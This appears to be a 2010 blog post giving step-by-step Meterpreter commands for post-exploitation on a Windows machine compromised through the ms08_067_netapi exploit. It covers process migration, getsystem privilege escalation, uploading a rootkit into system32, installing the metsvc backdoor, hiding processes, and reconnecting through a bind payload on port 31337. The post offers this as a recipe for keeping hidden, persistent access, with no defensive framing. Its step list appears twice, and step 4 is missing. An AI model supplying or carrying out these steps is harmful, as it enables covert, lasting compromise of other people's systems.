0
1 votes
Why Go Root When You Can Have System?
09 July 2010
let's change gears for a bit and talk about system and network access. Root or Admin access is all fine and good, but lets go System and Kernel level. If any of you have used Rootkits, you know the power that they have over the system. In this blog post i will cover the ways that rootkits can be used in conjunction with metasploit to maintain access at the system and kernel level. First let's go over the scenario: So you have exploited an windows box through some exploit, for this document let's use the ms08_067_netapi exploit, with the use of a meterpreter shell.
These are the steps i will cover to get system level first:
1) Dump PID's of the system, invade the process space of an existing process such as explorer.exe. --> ps (dumps processes and PIDs)-->migrate PID for Explorer.exe (moves the meterpreter session to the process id)
2) Get system level access --> getsystem
3) Verify --> getuid
5) Uploading our rootkit --> cd / --> cd windows/system32 --> "upload your favorite rootkit -> name of the file" (without the quotes, sorry i had to use it because the command for meterpreter to set the filename is the same as my arrows except one less -)
6) uploading our meterpreter backdoor --> run metsvc
7) dropping to a command prompt and starting our rootkit --> shell --> type the command you would normally use to start and interact with the rootkit (NOTE: you will want to configure the rootkit before you upload and execute it)
8) Verifying all processes are hidden --> type exit --> ps --> We are good
9) Accessing your backdoor --> use exploit/multi/handler --> set payload windows/metsvc_bind_tcp --> set rhost "target address" --> set lport 31337 --> exploit
10) That quickly we are connected back to the meterpreter session, and we are hidden in the kernel with the rootkit running, and we still have system level access!
These are the steps i will cover to get system level first:
1) Dump PID's of the system, invade the process space of an existing process such as explorer.exe. --> ps (dumps processes and PIDs)-->migrate PID for Explorer.exe (moves the meterpreter session to the process id)
2) Get system level access --> getsystem
3) Verify --> getuid
5) Uploading our rootkit --> cd / --> cd windows/system32 --> "upload your favorite rootkit -> name of the file" (without the quotes, sorry i had to use it because the command for meterpreter to set the filename is the same as my arrows except one less -)
6) uploading our meterpreter backdoor --> run metsvc
7) dropping to a command prompt and starting our rootkit --> shell --> type the command you would normally use to start and interact with the rootkit (NOTE: you will want to configure the rootkit before you upload and execute it)
8) Verifying all processes are hidden --> type exit --> ps --> We are good
9) Accessing your backdoor --> use exploit/multi/handler --> set payload windows/metsvc_bind_tcp --> set rhost "target address" --> set lport 31337 --> exploit
10) That quickly we are connected back to the meterpreter session, and we are hidden in the kernel with the rootkit running, and we still have system level access!
